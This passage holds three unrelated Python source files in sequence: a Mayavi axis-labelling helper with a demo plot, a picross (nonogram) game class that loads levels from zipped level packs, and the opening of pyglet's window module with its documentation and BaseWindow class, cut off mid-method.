'zlabel'        Z axis label text (default = 'Z')
'handle'        Graphics handle of object (if bounding box is to be plotted)
'title_size'    Font size of the title text (default = 25)
'ticks'         Number of divisions on each axis (default = 7)
'font_scaling'  Font scaling factor for axis text (default = 0.7)
'background'    Background colour (can be 'b' (black) or 'w' (white))

=== Notes ===
Disbaling figure title: specify title_string='void' OR title_string='Void' OR 
title_string='VOID' to disable figure title.

Disabling bounding box: specify handle='void' OR handle='Void' OR handle='VOID' 
to disable figure bounding box.

=== Usage ===
from mayaxes import mayaxes
mayaxes('Figure title','X axis label','Y axis label','Z axis label')

OR

mayaxes(title_string='TITLE',xlabel='X',ylabel='Y',zlabel='Z',title_size=25,ticks=7,font_scaling=0.7)

=== Example ===
from mayaxes import test_mayaxes
test_mayaxes()

@author: Nathan Donaldson
"""

def mayaxes(title_string='VOID', xlabel='VOID', ylabel='VOID', zlabel='VOID', handle='VOID', \
    title_size=25, ticks=7, font_scaling=0.7, background='w'):
    
    if type(title_string) != str or type(xlabel) != str  or type(ylabel) != str or type(zlabel) != str:
        print('ERROR: label inputs must all be strings')  
        return
    elif type(ticks) != int:
        print('ERROR: number of ticks must be an integer')
        return
    elif type(font_scaling) != float and type(font_scaling) != int:
        print('Error: font scaling factor must be an integer or a float')
        return
    
    from mayavi.mlab import axes,title,gcf,outline
    
    # Create axes object
    ax = axes()
    
    # Font factor globally adjusts figure text size
    ax.axes.font_factor = font_scaling
    
    # Number of ticks along each axis
    ax.axes.number_of_labels = ticks
   
    # Set axis labels to input strings
    # (spaces are included for padding so that labels do not intersect with axes)
    if xlabel=='void' or xlabel=='Void' or xlabel=='VOID':
        print 'X axis label title disabled'
    else:
        ax.axes.x_label = '          ' + xlabel 

    if ylabel=='void' or ylabel=='Void' or ylabel=='VOID':
        print 'Y axis label disabled'
    else:
        ax.axes.y_label = ylabel + '          '

    if zlabel=='void' or zlabel=='Void' or zlabel=='VOID':
        print 'Z axis label disabled'
    else:
        ax.axes.z_label = zlabel + '     '
    
    # Create figure title
    if title_string=='void' or title_string=='Void' or title_string=='VOID':
        print 'Figure title disabled'
    else:
        text_title = title(title_string)
        text_title.x_position = 0.5
        text_title.y_position = 0.9
        text_title.property.color = (0.0, 0.0, 0.0)
        text_title.actor.text_scale_mode = 'none'
        text_title.property.font_size = title_size
        text_title.property.justification = 'centered'
        
    # Create bounding box
    if handle=='void' or handle=='Void' or handle=='VOID':
        print 'Bounding box disabled'
    else:
        if background == 'w':
            bounding_box = outline(handle, color=(0.0, 0.0, 0.0), opacity=0.2)
        elif background == 'b':
            bounding_box = outline(handle, color=(1.0, 1.0, 1.0), opacity=0.2)
        
    # Set axis, labels and titles to neat black text
    #ax.property.color = (0.0, 0.0, 0.0)
    #ax.title_text_property.color = (0.0, 0.0, 0.0)
    #ax.label_text_property.color = (0.0, 0.0, 0.0)
    ax.label_text_property.bold = False
    ax.label_text_property.italic = False
    ax.title_text_property.italic = False
    ax.title_text_property.bold = False

    # Reset axis range
    ax.axes.use_ranges = True

    # Set scene background, axis and text colours    
    fig = gcf()    
    if background == 'w':
        fig.scene.background = (1.0, 1.0, 1.0)
        ax.label_text_property.color = (0.0, 0.0, 0.0)
        ax.property.color = (0.0, 0.0, 0.0)
        ax.title_text_property.color = (0.0, 0.0, 0.0)
    elif background == 'b':
        fig.scene.background = (0.0, 0.0, 0.0)
        ax.label_text_property.color = (1.0, 1.0, 1.0)
        ax.property.color = (1.0, 1.0, 1.0)
        ax.title_text_property.color = (1.0, 1.0, 1.0)
    fig.scene.parallel_projection = True
    
def test_mayaxes():

    from mayaxes import mayaxes
    from scipy import sqrt,sin,meshgrid,linspace,pi
    import mayavi.mlab as mlab
        
    resolution = 200
    lambda_var = 3
    theta = linspace(-lambda_var*2*pi,lambda_var*2*pi,resolution)
    
    x, y = meshgrid(theta, theta)
    r = sqrt(x**2 + y**2)
    z = sin(r)/r
    
    fig = mlab.figure(size=(1024,768))
    surf = mlab.surf(theta,theta,z,colormap='jet',opacity=1.0,warp_scale='auto') 
    mayaxes(title_string='Figure 1: Diminishing polar cosine series', \
        xlabel='X data',ylabel='Y data',zlabel='Z data',handle=surf)
    
    fig.scene.camera.position = [435.4093863309094, 434.1268937227623, 315.90311468125287]
    fig.scene.camera.focal_point = [94.434632665253829, 93.152140057106593, -25.071638984402856]
    fig.scene.camera.view_angle = 30.0
    fig.scene.camera.view_up = [0.0, 0.0, 1.0]
    fig.scene.camera.clipping_range = [287.45231734040635, 973.59247058049255]
    fig.scene.camera.compute_view_plane_normal()
    fig.scene.render()   
    
    mlab.show() 

#!/usr/bin/env python
#
# Copyright (C) 2007 Sascha Peilicke <sasch.pe@gmx.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
#

from random import randrange
from zipfile import ZipFile
from StringIO import StringIO

# Constants
DEFAULT_LEVELPACK = './data/default_pack.zip'

SKILL_EASY = 'Easy'			# These values should match the
SKILL_MEDIUM = 'Medium'		# the level files!
SKILL_HARD = 'Hard'

FIELD_INVALID = 0			# Constants describing a field on 
FIELD_VALID = 1				# the playfield
FIELD_MARKED_VALID = 2
FIELD_MARKED_INVALID = 4
FIELD_OPEN = 8



class Game(object):
	"""A paint by numbers game also called nonogram.
	"""
	
	def __init__(self, skill=None):
		"""Creates a picross game.

		Parameters:
			skill		- Desired skill level (None == random)
		"""
		self.__level = None
		self.__name = None
		self.__skill = None
		self.__fieldsToOpen = 0
		self.__fieldsOpened = 0
		self.load(skill=skill)

	#
	# Miscellaneous methods
	#

	def _debug_print(self):
		print self.getInfo()
		print 'go: %s' % (self.__gameOver)
		for row in self.__level:
			print row


	#
	# Game information retrieval
	#

	def getInfo(self):
		"""Returns the name, skill and size of the level
		"""
		return self.__name,self.__skill,len(self.__level)


	def getRowHint(self,row):
		"""Returns the hint for a specific row.
		"""
		hint,count = [],0
		for columnItem in self.__level[row]:
			if columnItem == FIELD_VALID:
				count += 1
			else:
				if count > 0:
					hint.append(count)
					count = 0
		if count > 0:
			hint.append(count)
		if not hint:
			hint.append(0)	
		return hint


	def getColumnHint(self,col):
		"""Returns the hint for a specific column.
		"""
		hint,count = [],0
		for row in self.__level:
			if row[col] == FIELD_VALID:
				count += 1
			else:
				if count > 0:
					hint.append(count)
					count = 0
		if count > 0:
			hint.append(count)
		if not hint: 
			hint.append(0)
		return hint


	def getField(self,col,row):
		return self.__level[row][col]

	def isGameWon(self):
		return self.__fieldsOpened == self.__fieldsToOpen

	#
	# Game manipulation methods
	#

	def restart(self):
		"""Reinitializes the current game 
		"""
		for i, row in enumerate(self.__level):
			for j, field in enumerate(row):
				if field == FIELD_OPEN or field == FIELD_MARKED_VALID:
					self.__level[i][j] = FIELD_VALID
				elif field == FIELD_MARKED_INVALID:
					self.__level[i][j] = FIELD_INVALID
		self.__gameOver = False
		self.__fieldsOpened = 0


	def openField(self,col,row):
		field = self.__level[row][col]
		if field == FIELD_VALID or field == FIELD_MARKED_VALID:
			self.__level[row][col] = FIELD_OPEN
			self.__fieldsOpened += 1
			return True
		else:
			return False


	def markField(self,col,row):
		field = self.__level[row][col]
		if field == FIELD_VALID:
			self.__level[row][col] = FIELD_MARKED_VALID
		elif field == FIELD_MARKED_VALID:
			self.__level[row][col] = FIELD_VALID
		elif field == FIELD_INVALID:
			self.__level[row][col] = FIELD_MARKED_INVALID
		elif field == FIELD_MARKED_INVALID:
			self.__level[row][col] = FIELD_INVALID
		return self.__level[row][col]
	

	def load(self,file=DEFAULT_LEVELPACK,skill=None):
		"""Loads a level either from a zipped levelpack or from a textfile.

		Parameters:
			file	- Can be a file path or zipped levelpack
			skill	- Desired level skill (None == random)
		"""
		if file.endswith('.lvl'):
			# Set the skill variable
			if file.startswith('easy'):		self.__skill = SKILL_EASY
			elif file.startswith('medium'):	self.__skill = SKILL_MEDIUM
			elif file.startswith('hard'):	self.__skill = SKILL_HARD

			self.__loadFileContent(open(file,'r'))

		elif file.endswith('.zip'):
			zip = ZipFile(file)

			# We have to select from which files in the zipfile we 
			# want to choose randomly based on the level's skill
			candidates = []

			if skill == SKILL_EASY:
				for file in zip.namelist():
					if file.startswith('easy'):
						candidates.append(file)				
			elif skill == SKILL_MEDIUM:
				for file in zip.namelist():
					if file.startswith('medium'):
						candidates.append(file)				
			elif skill == SKILL_HARD:
				for file in zip.namelist():
					if file.startswith('hard'):
						candidates.append(file)				

			# This should never happen in a good levelpack, but if it
			# is malformed, just pick something!
			if not candidates:
				candidates = zip.namelist()

			# Select one candidate randomly
			which = candidates[randrange(len(candidates))]
			# Set the skill variable
			if which.startswith('easy'):	self.__skill = SKILL_EASY
			elif which.startswith('medium'):self.__skill = SKILL_MEDIUM
			elif which.startswith('hard'):	self.__skill = SKILL_HARD
			# Read from zipfile and load file content
			buf = zip.read(which)
			self.__loadFileContent(StringIO(buf))


	def __loadFileContent(self,file):
		"""Actually loads the level data from a file.
		"""
		self.__level = []
		for line in file:
			if line.startswith('name:'):
				self.__name = line[5:].strip()
			elif line[0] == '0' or line[0] == '1':
				row = []
				for field in line:
					if field == '0': 
						row.append(FIELD_INVALID)
					elif field == '1':
						self.__fieldsToOpen += 1
						row.append(FIELD_VALID)
				self.__level.append(row)

# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions 
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#  * Redistributions in binary form must reproduce the above copyright 
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materials provided with the
#    distribution.
#  * Neither the name of pyglet nor the names of its
#    contributors may be used to endorse or promote products
#    derived from this software without specific prior written
#    permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------

"""Windowing and user-interface events.

This module allows applications to create and display windows with an
OpenGL context.  Windows can be created with a variety of border styles 
or set fullscreen.

You can register event handlers for keyboard, mouse and window events.
For games and kiosks you can also restrict the input to your windows,
for example disabling users from switching away from the application
with certain key combinations or capturing and hiding the mouse.

Getting started
---------------

Call the Window constructor to create a new window::

    from pyglet.window import Window
    win = Window(width=640, height=480)

Attach your own event handlers::

    @win.event
    def on_key_press(symbol, modifiers):
        # ... handle this event ...

Place drawing code for the window within the `Window.on_draw` event handler::

    @win.event
    def on_draw():
        # ... drawing code ...

Call `pyglet.app.run` to enter the main event loop (by default, this
returns when all open windows are closed)::

    from pyglet import app
    app.run()

Creating a game window
----------------------

Use `Window.set_exclusive_mouse` to hide the mouse cursor and receive relative
mouse movement events.  Specify ``fullscreen=True`` as a keyword argument to
the `Window` constructor to render to the entire screen rather than opening a
window::

    win = Window(fullscreen=True)
    win.set_exclusive_mouse()

Working with multiple screens
-----------------------------

By default, fullscreen windows are opened on the primary display (typically
set by the user in their operating system settings).  You can retrieve a list
of attached screens and select one manually if you prefer.  This is useful for
opening a fullscreen window on each screen::

    display = window.get_platform().get_default_display()
    screens = display.get_screens()
    windows = []
    for screen in screens:
        windows.append(window.Window(fullscreen=True, screen=screen))

Specifying a screen has no effect if the window is not fullscreen.

Specifying the OpenGL context properties
----------------------------------------

Each window has its own context which is created when the window is created.
You can specify the properties of the context before it is created
by creating a "template" configuration::

    from pyglet import gl
    # Create template config
    config = gl.Config()
    config.stencil_size = 8
    config.aux_buffers = 4
    # Create a window using this config
    win = window.Window(config=config)

To determine if a given configuration is supported, query the screen (see
above, "Working with multiple screens")::

    configs = screen.get_matching_configs(config)
    if not configs:
        # ... config is not supported
    else:
        win = window.Window(config=configs[0])

"""
from __future__ import division
from builtins import object
from future.utils import with_metaclass

__docformat__ = 'restructuredtext'
__version__ = '$Id$'

import sys

import pyglet
from pyglet import gl
from pyglet.event import EventDispatcher
import pyglet.window.key
import pyglet.window.event

_is_epydoc = hasattr(sys, 'is_epydoc') and sys.is_epydoc


class WindowException(Exception):
    """The root exception for all window-related errors."""
    pass


class NoSuchDisplayException(WindowException):
    """An exception indicating the requested display is not available."""
    pass


class NoSuchConfigException(WindowException):
    """An exception indicating the requested configuration is not
    available."""
    pass


class NoSuchScreenModeException(WindowException):
    """An exception indicating the requested screen resolution could not be
    met."""
    pass


class MouseCursorException(WindowException):
    """The root exception for all mouse cursor-related errors."""
    pass


class MouseCursor(object):
    """An abstract mouse cursor."""

    #: Indicates if the cursor is drawn using OpenGL.  This is True
    #: for all mouse cursors except system cursors.
    drawable = True

    def draw(self, x, y):
        """Abstract render method.

        The cursor should be drawn with the "hot" spot at the given
        coordinates.  The projection is set to the pyglet default (i.e., 
        orthographic in window-space), however no other aspects of the 
        state can be assumed.

        :Parameters:
            `x` : int
                X coordinate of the mouse pointer's hot spot.
            `y` : int
                Y coordinate of the mouse pointer's hot spot.

        """
        raise NotImplementedError('abstract')


class DefaultMouseCursor(MouseCursor):
    """The default mouse cursor used by the operating system."""
    drawable = False


class ImageMouseCursor(MouseCursor):
    """A user-defined mouse cursor created from an image.

    Use this class to create your own mouse cursors and assign them
    to windows.  There are no constraints on the image size or format.
    """
    drawable = True

    def __init__(self, image, hot_x=0, hot_y=0):
        """Create a mouse cursor from an image.

        :Parameters:
            `image` : `pyglet.image.AbstractImage`
                Image to use for the mouse cursor.  It must have a
                valid ``texture`` attribute.
            `hot_x` : int
                X coordinate of the "hot" spot in the image relative to the
                image's anchor.
            `hot_y` : int
                Y coordinate of the "hot" spot in the image, relative to the
                image's anchor.
        """
        self.texture = image.get_texture()
        self.hot_x = hot_x
        self.hot_y = hot_y

    def draw(self, x, y):
        gl.glPushAttrib(gl.GL_ENABLE_BIT | gl.GL_CURRENT_BIT)
        gl.glColor4f(1, 1, 1, 1)
        gl.glEnable(gl.GL_BLEND)
        gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
        self.texture.blit(x - self.hot_x, y - self.hot_y, 0)
        gl.glPopAttrib()


def _PlatformEventHandler(data):
    """Decorator for platform event handlers.  
    
    Apply giving the platform-specific data needed by the window to associate
    the method with an event.  See platform-specific subclasses of this
    decorator for examples.

    The following attributes are set on the function, which is returned
    otherwise unchanged:

    _platform_event
        True
    _platform_event_data
        List of data applied to the function (permitting multiple decorators
        on the same method).
    """
    def _event_wrapper(f):
        f._platform_event = True
        if not hasattr(f, '_platform_event_data'):
            f._platform_event_data = []
        f._platform_event_data.append(data)
        return f
    return _event_wrapper


def _ViewEventHandler(f):
    f._view = True
    return f


class _WindowMetaclass(type):
    """Sets the _platform_event_names class variable on the window
    subclass.
    """
    def __init__(cls, name, bases, dict):
        cls._platform_event_names = set()
        for base in bases:
            if hasattr(base, '_platform_event_names'):
                cls._platform_event_names.update(base._platform_event_names)
        for name, func in dict.items():
            if hasattr(func, '_platform_event'):
                cls._platform_event_names.add(name)
        super(_WindowMetaclass, cls).__init__(name, bases, dict)


class BaseWindow(with_metaclass(_WindowMetaclass, EventDispatcher)):
    """Platform-independent application window.

    A window is a "heavyweight" object occupying operating system resources.
    The "client" or "content" area of a window is filled entirely with
    an OpenGL viewport.  Applications have no access to operating system
    widgets or controls; all rendering must be done via OpenGL.

    Windows may appear as floating regions or can be set to fill an entire
    screen (fullscreen).  When floating, windows may appear borderless or
    decorated with a platform-specific frame (including, for example, the
    title bar, minimize and close buttons, resize handles, and so on).

    While it is possible to set the location of a window, it is recommended
    that applications allow the platform to place it according to local
    conventions.  This will ensure it is not obscured by other windows,
    and appears on an appropriate screen for the user.

    To render into a window, you must first call `switch_to`, to make
    it the current OpenGL context.  If you use only one window in the
    application, there is no need to do this.

    :Ivariables:
        `has_exit` : bool
            True if the user has attempted to close the window.

            :deprecated: Windows are closed immediately by the default
                `on_close` handler when `pyglet.app.event_loop` is being
                used.

    """

    # Filled in by metaclass with the names of all methods on this (sub)class
    # that are platform event handlers.
    _platform_event_names = set()

    #: The default window style.
    WINDOW_STYLE_DEFAULT = None
    #: The window style for pop-up dialogs.
    WINDOW_STYLE_DIALOG = 'dialog'
    #: The window style for tool windows.
    WINDOW_STYLE_TOOL = 'tool'
    #: A window style without any decoration.
    WINDOW_STYLE_BORDERLESS = 'borderless' 

    #: The default mouse cursor.
    CURSOR_DEFAULT = None
    #: A crosshair mouse cursor.
    CURSOR_CROSSHAIR = 'crosshair'
    #: A pointing hand mouse cursor.
    CURSOR_HAND = 'hand'
    #: A "help" mouse cursor; typically a question mark and an arrow.
    CURSOR_HELP = 'help'
    #: A mouse cursor indicating that the selected operation is not permitted.
    CURSOR_NO = 'no'
    #: A mouse cursor indicating the element can be resized.
    CURSOR_SIZE = 'size'
    #: A mouse cursor indicating the element can be resized from the top
    #: border.
    CURSOR_SIZE_UP = 'size_up'
    #: A mouse cursor indicating the element can be resized from the
    #: upper-right corner.
    CURSOR_SIZE_UP_RIGHT = 'size_up_right'
    #: A mouse cursor indicating the element can be resized from the right 
    #: border.
    CURSOR_SIZE_RIGHT = 'size_right'
    #: A mouse cursor indicating the element can be resized from the lower-right
    #: corner.
    CURSOR_SIZE_DOWN_RIGHT = 'size_down_right'
    #: A mouse cursor indicating the element can be resized from the bottom 
    #: border.
    CURSOR_SIZE_DOWN = 'size_down'
    #: A mouse cursor indicating the element can be resized from the lower-left
    #: corner.
    CURSOR_SIZE_DOWN_LEFT = 'size_down_left'
    #: A mouse cursor indicating the element can be resized from the left 
    #: border.
    CURSOR_SIZE_LEFT = 'size_left'
    #: A mouse cursor indicating the element can be resized from the upper-left
    #: corner.
    CURSOR_SIZE_UP_LEFT = 'size_up_left'
    #: A mouse cursor indicating the element can be resized vertically.
    CURSOR_SIZE_UP_DOWN = 'size_up_down'
    #: A mouse cursor indicating the element can be resized horizontally.
    CURSOR_SIZE_LEFT_RIGHT = 'size_left_right'
    #: A text input mouse cursor (I-beam).
    CURSOR_TEXT = 'text'
    #: A "wait" mouse cursor; typically an hourglass or watch.
    CURSOR_WAIT = 'wait'
    #: The "wait" mouse cursor combined with an arrow.
    CURSOR_WAIT_ARROW = 'wait_arrow'

    has_exit = False

    #: Window display contents validity.  The `pyglet.app` event loop
    #: examines every window each iteration and only dispatches the `on_draw`
    #: event to windows that have `invalid` set.  By default, windows always
    #: have `invalid` set to ``True``.
    #:
    #: You can prevent redundant redraws by setting this variable to ``False``
    #: in the window's `on_draw` handler, and setting it to True again in
    #: response to any events that actually do require a window contents
    #: update.
    #:
    #: :type: bool
    #: :since: pyglet 1.1
    invalid = True

    #: Legacy invalidation flag introduced in pyglet 1.2: set by all event
    #: dispatches that go to non-empty handlers.  The default 1.2 event loop
    #: will therefore redraw after any handled event or scheduled function.
    _legacy_invalid = True

    # Instance variables accessible only via properties

    _width = None
    _height = None
    _caption = None
    _resizable = False
    _style = WINDOW_STYLE_DEFAULT
    _fullscreen = False
    _visible = False
    _vsync = False
    _screen = None
    _config = None
    _context = None

    # Used to restore window size and position after fullscreen
    _windowed_size = None
    _windowed_location = None

    # Subclasses should update these after relevant events
    _mouse_cursor = DefaultMouseCursor()
    _mouse_x = 0
    _mouse_y = 0
    _mouse_visible = True
    _mouse_exclusive = False
    _mouse_in_window = False

    _event_queue = None
    _enable_event_queue = True    # overridden by EventLoop.
    _allow_dispatch_event = False # controlled by dispatch_events stack frame

    # Class attributes

    _default_width = 640
    _default_height = 480

    def __init__(self, 
                 width=None,
                 height=None,
                 caption=None,
                 resizable=False,
                 style=WINDOW_STYLE_DEFAULT,
                 fullscreen=False,
                 visible=True,
                 vsync=True,
                 display=None,
                 screen=None,
                 config=None,
                 context=None,
                 mode=None):
        """Create a window.

        All parameters are optional, and reasonable defaults are assumed
        where they are not specified.

        The `display`, `screen`, `config` and `context` parameters form
        a hierarchy of control: there is no need to specify more than 
        one of these.  For example, if you specify `screen` the `display`
        will be inferred, and a default `config` and `context` will be
        created.

        `config` is a special case; it can be a template created by the
        user specifying the attributes desired, or it can be a complete
        `config` as returned from `Screen.get_matching_configs` or similar.

        The context will be active as soon as the window is created, as if
        `switch_to` was just called.

        :Parameters:
            `width` : int
                Width of the window, in pixels.  Defaults to 640, or the
                screen width if `fullscreen` is True.
            `height` : int
                Height of the window, in pixels.  Defaults to 480, or the
                screen height if `fullscreen` is True.
            `caption` : str or unicode
                Initial caption (title) of the window.  Defaults to
                ``sys.argv[0]``.
            `resizable` : bool
                If True, the window will be resizable.  Defaults to False.
            `style` : int
                One of the ``WINDOW_STYLE_*`` constants specifying the
                border style of the window.
            `fullscreen` : bool
                If True, the window will cover the entire screen rather
                than floating.  Defaults to False.
            `visible` : bool
                Determines if the window is visible immediately after
                creation.  Defaults to True.  Set this to False if you
                would like to change attributes of the window before
                having it appear to the user.
            `vsync` : bool
                If True, buffer flips are synchronised to the primary screen's
                vertical retrace, eliminating flicker.
            `display` : `Display`
                The display device to use.  Useful only under X11.
            `screen` : `Screen`
                The screen to use, if in fullscreen.
            `config` : `pyglet.gl.Config`
                Either a template from which to create a complete config,
                or a complete config.
            `context` : `pyglet.gl.Context`
                The context to attach to this window.  The context must
                not already be attached to another window.
            `mode` : `ScreenMode`
                The screen will be switched to this mode if `fullscreen` is
                True.  If None, an appropriate mode is selected to accomodate
                `width` and `height.`

        """
        EventDispatcher.__init__(self)
        self._event_queue = []

        if not display:
            display = get_platform().get_default_display()

        if not screen:
            screen = display.get_default_screen()

        if not config:
            for template_config in [
                gl.Config(double_buffer=True, depth_size=24),
                gl.Config(double_buffer=True, depth_size=16),
                None]:
                try:
                    config = screen.get_best_config(template_config)
                    break
                except NoSuchConfigException:
                    pass
            if not config:
                raise NoSuchConfigException('No standard config is available.')

        if not config.is_complete():
            config = screen.get_best_config(config)

        if not context:
            context = config.create_context(gl.current_context)

        # Set these in reverse order to above, to ensure we get user
        # preference
        self._context = context
        self._config = self._context.config
        # XXX deprecate config's being screen-specific
        if hasattr(self._config, 'screen'):
            self._screen = self._config.screen
        else:
            display = self._config.canvas.display
            self._screen = display.get_default_screen()
        self._display = self._screen.display

        if fullscreen:
            if width is None and height is None:
                self._windowed_size = self._default_width, self._default_height
            width, height = self._set_fullscreen_mode(mode, width, height)
            if not self._windowed_size:
                self._windowed_size = width, height
        else:
            if width is None:
                width = self._default_width
            if height is None:
                height = self._default_height

        self._width = width
        self._height = height
        self._resizable = resizable
        self._fullscreen = fullscreen
        self._style = style
        if pyglet.options['vsync'] is not None:
            self._vsync = pyglet.options['vsync']
        else:
            self._vsync = vsync

        if caption is None:
            caption = sys.argv[0]
            # Decode hack for Python2 unicode support:
            if hasattr(caption, "decode"):
                try:
                    caption = caption.decode("utf8")
                except UnicodeDecodeError:
                    caption = "pyglet"
        self._caption = caption

        from pyglet import app
        app.windows.add(self)
        self._create()

        self.switch_to()
        if visible:
            self.set_visible(True)
            self.activate()

    def __del__(self):
        # Always try to clean up the window when it is dereferenced.
        # Makes sure there are no dangling pointers or memory leaks.
        # If the window is already closed, pass silently.
        try:
            self.close()
        except:   # XXX  Avoid a NoneType error if already closed.
            pass

    def __repr__(self):
        return '%s(width=%d, height=%d)' % \
            (self.__class__.__name__, self.width, self.height)

    def _create(self):
        raise NotImplementedError('abstract')

    def _recreate(self, changes):
        """Recreate the window with current attributes.

        :Parameters:
            `changes` : list of str
                List of attribute names that were changed since the last
                `_create` or `_recreate`.  For example, ``['fullscreen']``
                is given if the window is to be toggled to or from fullscreen. 
        """
        raise NotImplementedError('abstract')

    def flip(self):
        """Swap the OpenGL front and back buffers.

        Call this method on a double-buffered window to update the
        visible display with the back buffer.  The contents of the back buffer
        is undefined after this operation.

        Windows are double-buffered by default.  This method is called
        automatically by `EventLoop` after the `on_draw` event.
        """
        raise NotImplementedError('abstract')

    def switch_to(self):
        """Make this window the current OpenGL rendering context.

        Only one OpenGL context can be active at a time.  This method sets
        the current window's context to be current.  You should use this
        method in preference to `pyglet.gl.Context.set_current`, as it may
        perform additional initialisation functions.
        """
        raise NotImplementedError('abstract')

    def set_fullscreen(self, fullscreen=True, screen=None, mode=None,
                       width=None, height=None):
        """Toggle to or from fullscreen.

        After toggling fullscreen, the GL context should have retained its
        state and objects, however the buffers will need to be cleared and
        redrawn.

        If `width` and `height` are specified and `fullscreen` is True, the
        screen may be switched to a different resolution that most closely
        matches the given size.  If the resolution doesn't match exactly,
        a higher resolution is selected and the window will be centered
        within a black border covering the rest of the screen.

        :Parameters:
            `fullscreen` : bool
                True if the window should be made fullscreen, False if it
                should be windowed.
            `screen` : Screen
                If not None and fullscreen is True, the window is moved to the
                given screen.  The screen must belong to the same display as
                the window.
            `mode` : `ScreenMode`
                The screen will be switched to the given mode.  The mode must
                have been obtained by enumerating `Screen.get_modes`.  If
                None, an appropriate mode will be selected from the given
                `width` and `height`.
            `width` : int
                Optional width of the window.  If unspecified, defaults to the
                previous window size when windowed, or the screen size if
                fullscreen.

                **Since:** pyglet 1.2
            `height` : int
                Optional height of the window.  If unspecified, defaults to
                the previous window size when windowed, or the screen size if
                fullscreen.

                **Since:** pyglet 1.2
        """
        if (fullscreen == self._fullscreen and 
            (screen is None or screen is self._screen) and
            (width is None or width == self._width) and
            (height is None or height == self._height)):
            return

        if not self._fullscreen:
            # Save windowed size
            self._windowed_size = self.get_size()
            self._windowed_location = self.get_location()

        if fullscreen and screen is not None:
            assert screen.display is self.display
            self._screen = screen

        self._fullscreen = fullscreen
        if self._fullscreen:
            self._width, self._height = self._set_fullscreen_mode(
                mode, width, height)
        else:
            self.screen.restore_mode()

            self._width, self._height = self._windowed_size
            if width is not None:
                self._width = width
            if height is not None:
                self._height = height

        self._recreate(['fullscreen'])

        if not self._fullscreen and self._windowed_location:
            # Restore windowed location.
            # TODO: Move into platform _create?
            # Not harmless on Carbon because upsets _width and _height
            # via _on_window_bounds_changed.
            if pyglet.compat_platform != 'darwin' or pyglet.options['darwin_cocoa']:
                self.set_location(*self._windowed_location)

    def _set_fullscreen_mode(self, mode, width, height):
        if mode is not None:
            self.screen.set_mode(mode)
            if width is None:
                width = self.screen.width
            if height is None:
                height = self.screen.height
        elif width is not None or height is not None:
            if width is None:
                width = 0
            if height is None:
                height = 0
            mode = self.screen.get_closest_mode(width, height)
            if mode is not None:
                self.screen.set_mode(mode)
            elif self.screen.get_modes():
                # Only raise exception if mode switching is at all possible.
                raise NoSuchScreenModeException(
                    'No mode matching %dx%d' % (width, height))
        else:
            width = self.screen.width
            height = self.screen.height
        return width, height

    def on_resize(self, width, height):
        """A default resize event handler.

        This default handler updates the GL viewport to cover the entire
        window and sets the ``GL_PROJECTION`` matrix to be orthogonal in
        window space.  The bottom-left corner is (0, 0) and the top-right
        corner is the width and height of the window in pixels.

        Override this event handler with your own to create another
        projection, for example in perspective.
        """
        # XXX avoid GLException by not allowing 0 width or height.
        width = max(1, width)
        height = max(1, height)
        gl.glViewport(0, 0, width, height)
        gl.glMatrixMode(gl.GL_PROJECTION)
        gl.glLoadIdentity()
        gl.glOrtho(0, width, 0, height, -1, 1)
        gl.glMatrixMode(gl.GL_MODELVIEW)

    def on_close(self):
        """Default on_close handler."""
        self.has_exit = True
        from pyglet import app
        if app.event_loop.is_running:
            self.close()

    def on_key_press(self, symbol, modifiers):
        """Default on_key_press handler."""
        if symbol == key.ESCAPE and not (modifiers & ~(key.MOD_NUMLOCK | 
                                                       key.MOD_CAPSLOCK | 
                                                       key.MOD_SCROLLLOCK)):
            self.dispatch_event('on_close')

    def close(self):
        """Close the window.

        After closing the window, the GL context will be invalid.  The
        window instance cannot be reused once closed (see also `set_visible`).

        The `pyglet.app.EventLoop.on_window_close` event is dispatched on
        `pyglet.app.event_loop` when this method is called.
        """
        from pyglet import app
        if not self._context:
            return
        app.windows.remove(self)
        self._context.destroy()
        self._config = None
        self._context = None
        if app.event_loop:
            app.event_loop.dispatch_event('on_window_close', self)
        self._event_queue = []

    def draw_mouse_cursor(self):
        """Draw the custom mouse cursor.

        If the current mouse cursor has ``drawable`` set, this method
        is called before the buffers are flipped to render it.  
        
        This method always leaves the ``GL_MODELVIEW`` matrix as current,
        regardless of what it was set to previously.  No other GL state
        is affected.

        There is little need to override this method; instead, subclass
        ``MouseCursor`` and provide your own ``draw`` method.
        """
        # Draw mouse cursor if set and visible.
        # XXX leaves state in modelview regardless of starting state
        if (self._mouse_cursor.drawable and
            self._mouse_visible and
            self._mouse_in_window):
            gl.glMatrixMode(gl.GL_PROJECTION)
